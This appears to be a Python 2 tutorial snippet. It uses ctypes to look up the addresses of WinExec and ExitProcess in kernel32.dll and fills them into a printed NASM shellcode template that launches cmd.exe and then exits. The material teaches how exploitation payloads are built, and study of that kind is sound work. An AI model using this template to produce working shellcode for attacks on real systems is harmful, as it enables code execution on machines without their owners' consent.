This code shows how ctypes can be used to retrieve the addresses of functions exported by a DLL.
import ctypes

# Python 2 script (print statement on the last line, u'' literal below):
# it resolves two kernel32 exports via ctypes and formats their addresses
# into an assembly text template, which is printed rather than executed.

# Windows-only: ctypes.windll resolves exports from kernel32.dll with the
# stdcall convention.
kernel32 = ctypes.windll.kernel32
# Module handle for kernel32.dll, passed to GetProcAddress below.
handle = kernel32.LoadLibraryW(u'kernel32.dll')
# NOTE(review): no restype/argtypes are declared, so ctypes treats both return
# values as C int; on a 64-bit interpreter a pointer above 4 GiB would be
# truncated. The template below is 32-bit (ebx), so confirm the interpreter
# bitness before trusting the printed addresses.
winExec_address = kernel32.GetProcAddress(handle,'WinExec') #Address of the WinExec export
exit_address = kernel32.GetProcAddress(handle,'ExitProcess') #Address of the ExitProcess export
# Assembly template (NASM syntax). The two %s slots receive the hex addresses
# resolved above, so the output is tied to the kernel32 mapping of the machine
# that generated it — presumably not portable across machines or reboots.
# The ';' comments are part of the string literal and appear in the output.
code = '''
;execcmd.asm
[Section .text]
global _start
_start:
jmp short GetCommand
CommandReturn:
pop ebx ;ebx holds the string
xor eax,eax
mov [ebx + 7],al ;insert the NULL character
push ebx
mov ebx,%s
call ebx ;call
xor eax,eax ;zero the register again, clears winexec retval
push eax
mov ebx, %s
call ebx ;call ExitProcess(0);
GetCommand:
;the N at the end of the db will be replaced with a null character
call CommandReturn
db "cmd.exeN"
''' % (hex(winExec_address), hex(exit_address))
# Emit the filled-in template to stdout (Python 2 print statement).
print code